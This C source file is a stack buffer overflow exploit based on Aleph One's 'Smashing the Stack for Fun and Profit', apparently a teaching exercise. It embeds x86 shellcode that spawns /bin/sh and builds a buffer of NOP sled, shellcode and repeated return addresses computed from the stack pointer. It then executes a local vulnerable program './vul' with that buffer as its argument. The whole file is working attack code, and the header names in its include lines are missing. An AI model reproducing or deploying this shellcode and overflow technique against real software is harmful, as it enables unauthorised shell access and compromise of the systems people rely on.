/* * Stack-smashing exploit code based on that given in * Smashing the Stack for Fun and Profit by Aleph One */ #include #include #include #include #define NOP 0x90 static char shellcode[] = "\xeb\x12\x5e\x31\xc0\x88\x46\x07" "\x50\x56\x31\xd2\x89\xe1\x89\xf3" "\xb0\x0b\xcd\x80\xe8\xe9\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68"; /* * Neat way of determining stack top address */ static unsigned int getesp(void) { __asm__("movl %esp,%eax"); } int main(int argc, const char *argv[]) { unsigned int addr; unsigned int bytes; unsigned int *ptr; char *args[3]; char *code; int numints; /* Where is the stack top? This is our starting point */ (void) fprintf(stdout, "Stack: %p\n", (void *)getesp()); /* Check command line arguments */ if (argc != 3) { (void) fprintf(stderr, "Usage: %s bufferbytes offset\n", argv[0]); exit(EXIT_FAILURE); } /* * We will overflow a return address in our vulnerable program * with this address. It should point to the NOPs in our code * buffer. */ addr = getesp() - atoi(argv[2]); (void) fprintf(stdout, "Using address %p\n", (void *)addr); /* Make room for the code (we add one extra for the null byte) */ bytes = atoi(argv[1]) + 1; code = malloc(bytes); /* Check malloc succeeded */ if (code == NULL) { perror("malloc()"); exit(EXIT_FAILURE); } /* How many addresses required to fill buffer? */ numints = bytes / sizeof (*ptr); /* Initialise entire buffer to return address */ ptr = (unsigned int *)code; do { *ptr = addr; ptr++; numints--; } while (numints); /* Add terminal byte */ code[bytes - 1] = '\0'; /* Set first half to NOPs */ (void) memset((void *)code, NOP, (bytes >> 1)); /* Put shellcode after NOPs */ (void) memcpy(code + (bytes >> 1), shellcode, strlen(shellcode)); /* Output data */ (void) fprintf(stdout, "Sending in buffer length: %d\n", strlen(code)); /* Set up for call to vulnerable program */ args[0] = "./vul"; args[1] = code; args[2] = NULL; /* Attack! */ (void) execlp(args[0], args[0], args[1], args[2]); return (0); }